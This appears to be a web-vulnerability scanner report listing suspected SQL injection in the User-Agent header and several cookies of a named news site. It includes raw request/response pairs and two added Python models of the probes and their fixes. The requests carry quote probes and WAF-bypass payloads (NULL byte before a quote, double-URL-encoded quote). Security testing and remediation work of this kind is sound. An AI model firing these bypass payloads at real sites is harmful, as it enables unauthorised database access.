Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 96430
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>There are lots of problems with using Spans ports, and usage is starting to decline, especially because they can introduce errors. Net Optics Director provides a better return on investement because it can isolate key traffic.</span> ...[SNIP]...
Request 2
GET /video/security%2527%2527/20979809001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:20 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:20 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security%2527%2527/20979809001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:41 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:41 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 67777
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 38477
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]...
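The two-probe test that every finding in this section relies on, reduced to a runnable model. This is an added example, not code from the scanner report or from the site under test: the visits table, its single row, the SAMPLE_COOKIE value and the two lookup functions are constructed for it. It shows why a lone quote breaks a string-concatenated query while a doubled quote is accepted as an escaped quote, and that a parameterised query behaves identically for both probes, which is the fix the remediation background calls for.

```python
"""Model of the single-quote / double-quote SQL injection probe (added example)."""
import sqlite3
from typing import Callable, Tuple

# Constructed sample value, shaped like the millisecond timestamps carried in
# the s_lv / s_nr cookies in the report.
SAMPLE_COOKIE = "1292111917529"


def make_db() -> sqlite3.Connection:
    """In-memory database holding one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (cookie TEXT, hits INTEGER)")
    conn.execute("INSERT INTO visits VALUES (?, ?)", (SAMPLE_COOKIE, 3))
    conn.commit()
    return conn


def lookup_concat(conn: sqlite3.Connection, cookie: str) -> Tuple[str, object]:
    """Vulnerable lookup: the cookie value is spliced into the SQL text.
    Returns ("ok", rows) or ("error", message); the error branch is what the
    scanner's 'general error message' refers to."""
    sql = "SELECT hits FROM visits WHERE cookie = '" + cookie + "'"
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.Error as exc:  # a lone quote leaves the literal unterminated
        return ("error", str(exc))


def lookup_param(conn: sqlite3.Connection, cookie: str) -> Tuple[str, object]:
    """Hardened lookup: the statement structure is fixed first and the value
    is bound second, so no cookie content can alter the statement."""
    rows = conn.execute(
        "SELECT hits FROM visits WHERE cookie = ?", (cookie,)
    ).fetchall()
    return ("ok", rows)


Lookup = Callable[[sqlite3.Connection, str], Tuple[str, object]]


def probe(lookup: Lookup, conn: sqlite3.Connection, base: str) -> dict:
    """The scanner's test: send base+' and then base+'' and record the outcome
    class of each.  {'quote': 'error', 'two_quotes': 'ok'} is the signature
    the report's findings describe."""
    return {
        "quote": lookup(conn, base + "'")[0],
        "two_quotes": lookup(conn, base + "''")[0],
    }


if __name__ == "__main__":
    db = make_db()
    print("concatenated :", probe(lookup_concat, db, SAMPLE_COOKIE))
    print("parameterised:", probe(lookup_param, db, SAMPLE_COOKIE))
```

Run as a script it prints the error/ok signature for the concatenated query and ok/ok for the parameterised one. The signature is what the scanner expects to see; the responses reproduced on this page show neither an error nor its disappearance, which is why the findings need manual confirmation.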
The ebNewBandWidth_.www.informationweek.com cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ebNewBandWidth_.www.informationweek.com cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte: the filter stops inspecting the value at the %00 and never sees the quote that follows, while the application platform behind it (a Java-based one here, judging by the X-ATG-Version response header) treats the NULL byte as an ordinary character and passes the whole value on to the query. You should fix the actual vulnerability within the application code, by parameterising the query rather than by extending the blocklist, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%00'; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68296
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%00''; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 38475
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]...
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529%00'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:14 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:14 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68296
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529%00''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:15 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:15 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/21090964001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_nr cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_nr cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_nr cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%2527; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:26 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:26 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68296
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%2527%2527; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:27 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:27 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/21090964001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
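A runnable model of the two filter bypasses reported in this section, the NULL byte placed ahead of the blocked quote (the ebNewBandWidth_, s_lv, iwkbtn_emc_101111 and s_nr findings) and the double-URL-encoded quote (the s_nr, REST URL parameter 1 and s_lv findings), together with the ordering fix the remediation detail asks for. This is an added example and not the site's WAF or application code: the blocklist, the C-style NUL truncation, the second decode step and all function names are constructed for it, and the model takes the remediation text at face value in assuming the web server has already performed one URL-decode before either the filter or the application sees the value.

```python
"""Model of NUL-byte and double-URL-encoding filter bypasses (added example)."""
from typing import Callable, Optional
from urllib.parse import unquote

# Constructed blocklist; real WAF rule sets are larger but fail in the same way.
BLOCKED = ("'", '"', "--", ";")


def waf_native_string(value: str) -> bool:
    """Model of a blocklist check written in C-style code: the value is handled
    as a NUL-terminated string, so inspection stops at the first \\x00 and
    anything after it is invisible to the filter.  True means 'allow'."""
    visible = value.split("\x00", 1)[0]
    return not any(token in visible for token in BLOCKED)


def app_decode(value: str) -> str:
    """What the application works with.  The server already decoded once; this
    application decodes a second time (the defect behind the %2527 findings)
    and, running on a managed runtime, keeps NUL bytes as ordinary characters."""
    return unquote(value)


def waf_after_canonicalisation(value: str) -> bool:
    """Fixed ordering: validate the value in exactly the form the query will
    receive, i.e. after every decode the application performs, and scan the
    whole string instead of stopping at NUL.  True means 'allow'."""
    return not any(token in app_decode(value) for token in BLOCKED)


Filter = Callable[[str], bool]


def reaches_query(value: str, check: Filter) -> Optional[str]:
    """Return the string that would be spliced into SQL if the filter lets the
    request through, or None if the filter blocked it."""
    if not check(value):
        return None
    return app_decode(value)


# Constructed probe values, mirroring the report's cookies after the server's
# single URL-decode: %00 has become a real NUL byte and %2527 has become %27.
NUL_BYPASS = "1292111917529\x00'"
DOUBLE_ENCODED = "1289542256120%27"
PLAIN_QUOTE = "1292111917529'"
BENIGN = "1292111917529"

if __name__ == "__main__":
    cases = [("NUL byte", NUL_BYPASS), ("double-encoded", DOUBLE_ENCODED),
             ("plain quote", PLAIN_QUOTE), ("benign", BENIGN)]
    for name, probe_value in cases:
        native = reaches_query(probe_value, waf_native_string)
        fixed = reaches_query(probe_value, waf_after_canonicalisation)
        print(f"{name:15} native WAF -> {native!r:28} canonicalised -> {fixed!r}")
```

With the native-string filter the plain quote is blocked but both bypass forms reach the query with a literal quote in them; with validation moved after canonicalisation all three are blocked and only the benign value passes. The reordered filter only closes the bypass in the defence-in-depth layer; the application's own fix is still to parameterise the query.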
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:24 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:24 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68296
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:25 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:25 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/21090964001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00'; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:09 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:09 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68311
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00''; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:10 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:10 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/44865844001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:59 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:59 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68311
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:00 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:00 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 38480
